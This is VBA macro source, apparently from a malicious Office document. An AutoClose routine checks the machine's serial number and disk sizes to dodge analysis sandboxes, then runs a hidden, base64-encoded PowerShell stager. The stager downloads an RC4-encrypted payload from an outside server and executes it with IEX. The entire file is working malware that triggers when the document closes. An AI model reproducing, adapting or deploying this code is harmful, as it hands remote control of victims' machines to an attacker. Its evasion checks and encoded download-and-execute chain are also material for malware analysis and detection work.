Sub AutoClose()
	SkBaqqtlnw
End Sub

Public Function SkBaqqtlnw() As Variant
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
	Set ID = objWMIService.ExecQuery("Select IdentifyingNumber from Win32_ComputerSystemproduct")
	For Each objItem In ID
		If StrComp(objItem.IdentifyingNumber, "2UA20511KN") = 0 Then End
	Next
	Set disksize = objWMIService.ExecQuery("Select Size from Win32_logicaldisk")
	For Each objItem In disksize
		If (objItem.Size = 42949603328#) Then End
		If (objItem.Size = 68719443968#) Then End
	Next
	Dim lFUbr As String
	lFUbr = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	lFUbr = lFUbr + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	lFUbr = lFUbr + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AF"
	lFUbr = lFUbr + "sAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUA"
	lFUbr = lFUbr + "UABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQ"
	lFUbr = lFUbr + "BjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQASwA9"
	lFUbr = lFUbr + "AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAG"
	lFUbr = lFUbr + "kAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUA"
	lFUbr = lFUbr + "cwAoACcASQB2AFYAXgBZADoARgB0AGYAQwBYAFQALAA9AGEAQQ"
	lFUbr = lFUbr + "BNAD8AagAjADcATwBRAHAAXQAmAHIAfABbAFoAeABuACcAKQA7"
	lFUbr = lFUbr + "ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD"
	lFUbr = lFUbr + "0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoA"
	lFUbr = lFUbr + "PQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJA"
	lFUbr = lFUbr + "BLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABf"
	lFUbr = lFUbr + "AF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAF"
	lFUbr = lFUbr + "sAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEA"
	lFUbr = lFUbr + "KQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQ"
	lFUbr = lFUbr + "ApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABd"
	lFUbr = lFUbr + "AD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAG"
	lFUbr = lFUbr + "IAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQA"
	lFUbr = lFUbr + "SABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAD0ATgBlAHcALQ"
	lFUbr = lFUbr + "BPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBX"
	lFUbr = lFUbr + "AGUAYgBDAGwAaQBlAG4AdAA7ACQAcwBlAHIAPQAkACgAWwBUAG"
	lFUbr = lFUbr + "UAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMA"
	lFUbr = lFUbr + "bwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4Adg"
	lFUbr = lFUbr + "BlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdABy"
	lFUbr = lFUbr + "AGkAbgBnACgAJwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAE"
	lFUbr = lFUbr + "MAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEA"
	lFUbr = lFUbr + "TgBnAEEANABBAEMANABBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQ"
	lFUbr = lFUbr + "B5AEEARABnAEEATwBnAEEANABBAEQAQQBBACcAKQApACkAOwAk"
	lFUbr = lFUbr + "AHQAPQAnAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQAaABlAG"
	lFUbr = lFUbr + "0AZQBzAC8AdwBwAC0AZgByAG8AbgB0AC4AcABoAHAAJwA7ACQA"
	lFUbr = lFUbr + "dwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQ"
	lFUbr = lFUbr + "B0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBh"
	lFUbr = lFUbr + "AHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG"
	lFUbr = lFUbr + "8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsA"
	lFUbr = lFUbr + "UwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQ"
	lFUbr = lFUbr + "BhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBl"
	lFUbr = lFUbr + "AHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAF"
	lFUbr = lFUbr + "MAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4A"
	lFUbr = lFUbr + "UAByAG8AeAB5ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQ"
	lFUbr = lFUbr + "BkAGQAKAAiAFUAcwBlAHIALQBBAGcAZQBuAHQAIgAsACIATQBv"
	lFUbr = lFUbr + "AHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzAC"
	lFUbr = lFUbr + "AATgBUACAANgAuADMAOwAgAFcAaQBuADYANAA7ACAAeAA2ADQA"
	lFUbr = lFUbr + "KQAgAEEAcABwAGwAZQBXAGUAYgBLAGkAdAAvADUAMwA3AC4AMw"
	lFUbr = lFUbr + "A2ACAAKABLAEgAVABNAEwALAAgAGwAaQBrAGUAIABHAGUAYwBr"
	lFUbr = lFUbr + "AG8AKQAgAEMAaAByAG8AbQBlAC8ANwA5AC4AMAAuADMAOQA0AD"
	lFUbr = lFUbr + "UALgA4ADgAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwA2ACIA"
	lFUbr = lFUbr + "KQA7AHQAcgB5AHsAJABpAGcAPQAkAHcAYwAuAEQAbwB3AG4AbA"
	lFUbr = lFUbr + "BvAGEAZABEAGEAdABhACgAJABzAGUAcgApAH0AYwBhAHQAYwBo"
	lFUbr = lFUbr + "AHsAfQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkAC"
	lFUbr = lFUbr + "gAIgBIAG8AcwB0ACIALAAiAHcAbQB3AGkAZgBiAGEAagB4AHgA"
	lFUbr = lFUbr + "YgBjAHgAbQB1AGMAeABtAGwAYwAuAGMAbwBtACIAKQA7ACQAdw"
	lFUbr = lFUbr + "BjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBDAG8AbwBr"
	lFUbr = lFUbr + "AGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AcQBNAGEAaQB5AG"
	lFUbr = lFUbr + "MASABMAHYAOABQAEEARQB0AGIASgBrAGYAVABMAFkAYwBPADEA"
	lFUbr = lFUbr + "agBYAHcAJQAzAEQAIgApADsAJABkAGEAdABhAD0AJAB3AGMALg"
	lFUbr = lFUbr + "BEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAk"
	lFUbr = lFUbr + "AHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdAD"
	lFUbr = lFUbr + "sAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AKAAkAGQA"
	lFUbr = lFUbr + "YQB0AGEALgBsAGUAbgBnAHQAaAAtADEAKQBdADsALQBqAG8AaQ"
	lFUbr = lFUbr + "BuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0"
	lFUbr = lFUbr + "AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="
	Set asd = CreateObject("WScript.Shell")
	asd.Run(lFUbr)
End Function
